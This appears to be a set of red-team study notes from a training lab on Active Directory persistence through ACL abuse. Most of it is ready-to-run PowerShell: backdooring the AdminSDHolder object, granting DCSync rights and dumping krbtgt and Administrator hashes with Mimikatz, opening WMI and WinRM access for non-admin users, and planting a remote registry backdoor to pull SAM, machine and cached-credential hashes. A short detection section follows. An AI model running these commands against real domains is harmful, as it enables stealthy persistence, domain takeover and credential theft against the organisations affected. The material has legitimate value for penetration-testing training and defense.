ACLs

AdminSDHolder
Admin Security Descriptor Holder

AdminSDHolder is a container object in Active Directory that stores the security descriptor
template for protected groups and their members. These groups have elevated privileges
and require extra security measures. The AdminSDHolder object's ACL is automatically
applied to all protected groups and their members, ensuring consistent permissions and
preventing unauthorized access.

Resides in the System container of a domain and used to control the permissions - using an
ACL - for certain built-in privileged groups (called Protected Groups).
Security Descriptor Propagator (SDPROP) runs every hour and compares the ACL of
protected groups and members with the ACL of AdminSDHolder and any differences are
overwritten on the object ACL.

shortly, AdminSDHolder protected ACLs from any unwanted Changes

→ With DA privileges (Full Control/Write permissions) on the AdminSDHolder object, it can

be used as a backdoor/persistence mechanism by adding a user with Full Permissions (or
other interesting permissions) to the AdminSDHolder object.
→ In 60 minutes (when SDPROP runs), the user will be added with FullControl to the AC of
groups like Domain Admins without actually being a member of it.

ACLs and ACEs in AdminSDHolder

1/11
ACLs and ACEs in any protected group
Administrators group

2/11
Backup Operators Group

3/11
4/11
Abuse
• Add FullControl permissions for a user to the AdminSDHolder using PowerView as Domain
Admin
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -
PrincipalSamAccountName <username> -Rights All -Verbose

Add-DomainObjectAcl -TargetIdentity
'CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local' -
PrincipalIdentity student1 -Rights All -PrincipalDomain dollarcorp.moneycorp.local -
TargetDomain dollarcorp.moneycorp.local -Verbose

→ Using ActiveDirectory Module and RACE toolkit

https://github.com/samratashok/RACE
Set-DCPermissions -Method AdminSDHolder -SAMAccountName student1 - Right
GenericAll -DistinguishedName
'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' -Verbose

• Add ResetPassword permissions for a user to the AdminSDHolder using PowerView as

Domain Admin
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -
PrincipalSamAccountName <username> -Rights ResetPassword -Verbose
Add-DomainObjectAcl -TargetIdentity
'CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local' -
PrincipalIdentity student1 -Rights ResetPassword -PrincipalDomain
dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose

Add-DomainObjectAcl -TargetIdentity
'CN=AdminSDHolder,CN=System,dc=dollarcorp,dc=moneycorp,dc=local' -
PrincipalIdentity student1 -Rights WriteMembers -PrincipalDomain
dollarcorp.moneycorp.local -TargetDomain dollarcorp.moneycorp.local -Verbose

→ Add WriteMembers permissions for a user to the AdminSDHolder using PowerView as

5/11
Domain Admin
Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -
PrincipalSamAccountName <username> -Rights WriteMembers -Verbose

• Add FullControl permissions for a user to the AdminSDHolder using ActiveDirectory

Module and Set-ADACL as Domain Admin
Set-ADACL -DistinguishedName
'CN=AdminSDHolder,CN=System,DC=dollarcorp,DC=moneycorp,DC=local' -Principal
<username> -Verbose

• Run SDProp manually using Invoke-SDPropagator.ps1

Invoke-SDPropagator -timeoutMinutes 1 -showProgress -Verbose
Invoke-SDPropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -
Verbose # For pre-Server 2008 machines

• Check the Domain Admins permission using PowerView as normal user

Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?
{$_.IdentityReference -match '<username>'}
Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | ForEach-Object {$_ |
Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_}
| ?{$_.IdentityName -match "student1"}

• Check the Domain Admins permission using ActiveDirectory Module as normal user
(Get-Acl -Path 'AD:\CN=Domain
Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local').Access | ?
{$_.IdentityReference -match '<username>'}

• Abuse FullControl by adding a user to the Domain Admins group using PowerView_dev
Add-DomainGroupMember -Identity 'Domain Admins' -Members <username> -Verbose
Add-ADGroupMember -Identity 'Domain Admins' -Members <username>

• Abuse FullControl by adding a user to the Domain Admins group using ActiveDirectory
Module
Add-ADGroupMember -Identity 'Domain Admins' -Members <username>

• Abuse ResetPassword by resetting a users password using PowerView_dev

Set-DomainUserPassword -Identity <username> -AccountPassword (ConvertTo-
SecureString "<new-password>" -AsPlainText -Force) -Verbose

• Abuse ResetPassword by resetting a users password using ActiveDirectory Module

Set-ADAccountPassword -Identity <username> -NewPassword (ConvertTo-SecureString
"<new-password>" -AsPlainText -Force) -Verbose

6/11
Rights Abuse (Persistence using ACLs)
With Domain Admin privileges, the ACL for the domain root can be modified to provide
useful rights like FullControl or the ability to run DCSync.

• Add FullControl permissions for a user to the ACL of the domain root using PowerView as
Domain Admin
Add-ObjectAcl -TargetDistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -
PrincipalSamAccountName <username> -Rights All -Verbose
Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -
PrincipalIdentity student1 -Rights All -PrincipalDomain dollarcorp.moneycorp.local -
TargetDomain dollarcorp.moneycorp.local -Verbose

• Add FullControl permissions for a user to the ACL of the domain root using
ActiveDirectory Module and Set-ADACL as Domain Admin
Set-ADACL -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Principal
<username> -Verbose
Set-ADACL -SamAccountName studentuser1 -DistinguishedName
'DC=dollarcorp,DC=moneycorp,DC=local' -Right GenericAll -Verbose

• Add DCSync rights for a user to the ACL of the domain root using PowerView as Domain
Admin
Add-ObjectAcl -TargetDistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -
PrincipalSamAccountName <username> -Rights DCSync -Verbose
Add-DomainObjectAcl -TargetIdentity 'DC=dollarcorp,DC=moneycorp,DC=local' -
PrincipalIdentity student1 -Rights DCSync -PrincipalDomain dollarcorp.moneycorp.local -
TargetDomain dollarcorp.moneycorp.local -Verbose
# 3 permissions: Replicating Directory Changes, Replicating Directory Changes All,
Replicating Directory Changes In Filtered Set

• Add DCSync rights for a user to the ACL of the domain root using ActiveDirectory Module
and Set-ADACL as Domain Admin
Set-ADACL -DistinguishedName 'DC=dollarcorp,DC=moneycorp,DC=local' -Principal
<username> -GUIDRight DCSync -Verbose
# 3 permissions: Replicating Directory Changes, Replicating Directory
Changes All, Replicating Directory Changes In Filtered Set

Set-ADACL -SamAccountName studentuser1 -DistinguishedName

'DC=dollarcorp,DC=moneycorp,DC=local' -GUIDRight DCSync -Verbose

• Check if we have replication rights required to run DCSync

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -
7/11
ResolveGUIDs | ? {($_.IdentityReference -match "<username>") -and (($_.ObjectType -
match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}

• Execute DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<Domain>\krbtgt"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<Domain>\Administrator"' # Can
be used for any user
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"

Conclusion:
AdminSDHolder is a sneaky method for an attacker to persist granting the ability to modify
the most privileged groups in Active Directory by leveraging a key security component.
Even if the permissions are changed on a protected group or user, SDProp will change the
securtiy permissions to match that of the AdminSDHolder object.

Detection:
Monitor the ACLs configured on the AdminSDHolder object. These should be kept at the
default – it is not usually necessary to add other groups to the AdminSDHolder ACL.
Monitor users and groups with AdminCount = 1 to identify accounts with ACLs set by
SDProp.
Find all users with security ACLs set by SDProp using the PowerShell AD cmdlets:
Import-Module ActiveDirectory
Get-ADObject -LDAPFilter "(&(admincount=1)(|(objectcategory=person)
(objectcategory=group)))" -Properties MemberOf,Created,Modified,AdminCount

Resources
https://adsecurity.org/?p=1906
https://blog.harmj0y.net/redteaming/abusing-active-directory-permissions-with-
powerview/
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/
how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence
https://github.com/jwardsmith/Active-Directory-Exploitation#rights-abuse-persistence-
using-acls

8/11
Security Descriptors
Security Descriptors
Security Descriptor Definition Language (SDDL) defines the format which is used to describe
a security descriptor. SDDL uses ACE strings for DACL and SACL
ace_type;ace_flags;rights;object_guid;inherit_object_guid;account_sid
EX: A;CI;CCDCLCSWRPWPRCWD;;;SID

The security descriptors are used to store the permissions an object has over an object.
If you can just make a little change in the security descriptor of an object, you can obtain
very interesting privileges over that object without needing to be member of a privileged
group.
https://learn.microsoft.com/en-us/windows/win32/secauthz/security-descriptor-
definition-language
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/security-
descriptors
what is DACLs, SACLs, ACEs ?
https://docs.netapp.com/us-en/ontap/smb-admin/security-descriptors-apply-file-folder-
security-concept.html

Abuse
→ Show the SDDL of a service
sc.exe sdshow <service>

• Enable our user the ability to execute WMI queries on a target machine e.g. Domain
Controller even without having Administrative privileges using the GUI as a Domain Admin.
Consists of two parts: must have the privileges to connect to the DCOM endpoint, and must
have the privileges to connect to the namespace

DCOM endpoint: Start Menu -> Component Service -> Computers -> My Computer ->
Properties -> COM Security Tab -> Access Permissions -> Edit Links -> Add our user -> Click
Allow for everything
Namespace: Start Menu -> Computer Management -> Services and Applications -> WMI
9/11
Control -> Properties -> Security Tab -> Root -> Security -> Add our user -> Click Allow for
everything -> Advanced -> Select our user -> Edit -> Applies to 'This namespace and
subnamespaces'

Access to execute remotely WMI

• Enable our user the ability to execute WMI queries on a target machine e.g. Domain
Controller even without having Administrative privileges using PowerShell commands
(modify ACLs to allow non-admin users access to securable objects) as Domain Admin

using RACE.ps1 module

→ On local machine for student1
Set-RemoteWMI -SamAccountName student1 -Verbose

→ On remote machine for student1 without explicit credentials

Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc –namespace
'root\cimv2' -Verbose # On remote machine for <username> without explicit credentials

→ On remote machine with explicit credentials. Only root\cimv2 and nested namespaces
Set-RemoteWMI -SamAccountName student1 -ComputerName dcorp-dc -Credential
Administrator –namespace 'root\cimv2' -Verbose # On remote machine with explicit
credentials. Only root\cimv2 and nested namespaces

→ On remote machine remove permissions

Set-RemoteWMI -UserName student1 -ComputerName dcorp-dc-namespace 'root\cimv2'
-Remove -Verbose #to remove changes # On remote machine, remove the permissions

→ Check if you can execute WMI queries

Get-Wmiobject -Class win32_operatingsystem -ComputerName <Domain Controller>

Access To WinRM
• Enable our user the ability to execute PowerShell Remoting to a target machine e.g.
Domain Controller even without having Administrative privileges using PowerShell
commands (modify ACLs to allow non-admin users access to securable objects) as Domain
Admin

using RACE.ps1 and PS remoting ### it's not stable after August 2020 patches

→ On local machine for student1

Set-RemotePSRemoting -SamAccountName student1 -Verbose # On local machine for
<username>

→ On remote machine for student1 without credentials

Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Verbose #
On remote machine for <username> without credentials
10/11
→ On remote machine, remove the permissions
Set-RemotePSRemoting -UserName student1 -ComputerName <remotehost> -Remove #
Remove # On remote machine, remove the permissions

Remote access to hashes

• Modify our user permissions on the Remote Registry service, and multiple registry keys on
a target machine e.g. Domain Controller even without having Administrative privileges
using PowerShell commands (modify ACLs to allow non-admin users access to securable
objects) as Domain Admin

• Access the registry and dump hashes creating a Reg backdoor using DAMP, so you can at
any moment retrieve the hash of the computer, the SAM and any cached AD credential in
the computer. So, it's very useful to give this permission to a regular user against a Domain
Controller computer

→ Using RACE or DAMP, with admin privs on remote machine To allows for the remote
retrieval of a system's machine and local account hashes, as well as its domain cached
credentials.
Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student1 -Verbose

→ As student1, retrieve machine account hash by Abuses the ACL backdoor set by Add-
RemoteRegBackdoor to remotely retrieve the local machine account hash for the specified
machine.
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose

→ Retrieve local account hash by Abuses the ACL backdoor set by Add-
RemoteRegBackdoor to remotely retrieve the local SAM account hashes for the specified
machine.
Get-RemoteLocalAccountHash -ComputerName dcorp-dc -Verbose

→ Retrieve domain cached credentials by Abuses the ACL backdoor set by Add-
RemoteRegBackdoor to remotely retrieve the domain cached credentials for the specified
machine.
Get-RemoteCachedCredential -ComputerName dcorp-dc -Verbose

Resources
https://github.com/jwardsmith/Active-Directory-Exploitation#rights-abuse-persistence-
using-acls
v

11/11